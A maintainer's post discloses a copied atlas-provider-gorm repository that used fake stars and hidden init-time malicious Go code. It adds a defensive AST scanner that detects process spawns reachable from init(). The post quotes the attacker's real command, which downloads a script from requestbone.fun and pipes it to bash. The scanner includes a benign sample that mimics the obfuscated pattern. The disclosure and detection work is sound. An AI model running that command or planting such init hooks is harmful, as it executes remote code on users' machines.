Someone copied our GitHub project, made it look more trustworthy by adding stars from many fake users, and then injected malicious code at runtime for potential users.

Our project is Atlas, and one of the providers we offer for it is the provider for GORM: https://github.com/ariga/atlas-provider-gorm (quite popular in our community).

Something crazy I found today before it went viral is that someone copied our GitHub project, faked stars for credibility from accounts created just a few weeks ago, and then injected malicious code at runtime for potential users.

The project: https://github.com/readyrevena/atlas-provider-gorm

The malicious code parts: https://github.com/readyrevena/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403-L412. This basically executes the following code on init:

wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &

I went over some of the stargazers, and it looks like it was done for other projects too. I expect the impact is much bigger than just our project.

Update: It's hard to detect the full impact. The attacker obfuscates the code, changing identifiers and scrambling the byte array order, so you can't easily search for it on GitHub. This makes it nearly impossible to track the full impact unless GitHub steps up and helps resolve this issue (I reported these repos to GitHub support).
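As an added example (not part of the original post, and not code from Atlas or from the copied repository): a small Go scanner for the pattern described above, a process spawn through os/exec or syscall that is reachable from an init() function, so it runs as soon as the package is imported. It matches on the file's AST rather than on strings, so renamed identifiers, an aliased import, or a command that is only assembled at runtime from a scrambled byte array do not hide it. The file names, the spawnFuncs list and the embedded sample source are my own constructions; the sample is parsed, never compiled or run.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// spawnFuncs are the process-spawning functions in os/exec and syscall.
var spawnFuncs = map[string]bool{"Command": true, "CommandContext": true, "Exec": true, "ForkExec": true, "StartProcess": true}

// ScanSource parses one Go file and reports, as "file:line: why" strings, os/exec or
// syscall spawn calls reachable from an init() function through same-file calls.
func ScanSource(filename, src string) ([]string, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	spawnPkgs := map[string]bool{} // local names of os/exec and syscall, aliases included
	for _, imp := range f.Imports {
		switch name := strings.Trim(imp.Path.Value, `"`); name {
		case "os/exec", "syscall":
			if imp.Name != nil {
				name = imp.Name.Name
			}
			spawnPkgs[name[strings.LastIndex(name, "/")+1:]] = true
		}
	}
	spawns := map[string][]string{} // function name -> spawn calls in its body
	calls := map[string][]string{}  // function name -> plain functions it calls
	var inits []string
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Body == nil || fn.Recv != nil {
			continue
		}
		name := fn.Name.Name
		if name == "init" { // a file may hold several init functions
			name = fmt.Sprintf("init@%d", fset.Position(fn.Pos()).Line)
			inits = append(inits, name)
		}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			if call, ok := n.(*ast.CallExpr); ok {
				switch fun := call.Fun.(type) {
				case *ast.Ident:
					calls[name] = append(calls[name], fun.Name)
				case *ast.SelectorExpr:
					if pkg, ok := fun.X.(*ast.Ident); ok && spawnPkgs[pkg.Name] && spawnFuncs[fun.Sel.Name] {
						reason := fmt.Sprintf("%s:%d: %s.%s", filename, fset.Position(call.Pos()).Line, pkg.Name, fun.Sel.Name)
						for _, a := range call.Args { // a non-literal argument is the obfuscation smell
							if _, lit := a.(*ast.BasicLit); !lit {
								reason += " with a runtime-computed argument"
								break
							}
						}
						spawns[name] = append(spawns[name], reason)
					}
				}
			}
			return true
		})
	}
	var findings []string
	for _, root := range inits { // depth-first walk of the same-file call graph from each init
		stack, seen := []string{root}, map[string]bool{}
		for len(stack) > 0 {
			name := stack[len(stack)-1]
			stack = stack[:len(stack)-1]
			if seen[name] {
				continue
			}
			seen[name] = true
			for _, s := range spawns[name] {
				findings = append(findings, s+", reachable from "+root)
			}
			stack = append(stack, calls[name]...)
		}
	}
	return findings, nil
}

// suspiciousSrc is a constructed sample, not the attacker's code, that mimics the pattern:
// init() reaches a helper that rebuilds a command from a scrambled byte array and hands it to a shell.
const suspiciousSrc = `package gormschema
import "os/exec"
var p = []byte{0x6f, 0x6c, 0x6c, 0x65, 0x68} // scrambled payload bytes, here just "hello" reversed
func decode() string { b := make([]byte, len(p)); for i := range p { b[len(p)-1-i] = p[i] }; return string(b) }
func run() { _ = exec.Command("/bin/bash", "-c", decode()).Start() }
func init() { run() }
`

func main() {
	fmt.Println(ScanSource("gorm.go", suspiciousSrc))
}
```

Point it at every .go file of a module you are about to depend on (for example the copy under the Go module cache) and read whatever it reports; an import-time process spawn in a schema provider has no legitimate reason to exist. The walk follows only calls to plain function names within one file, so a payload split across files, or reached through a method value or function variable, needs a real call graph (golang.org/x/tools/go/callgraph) rather than this single-file pass.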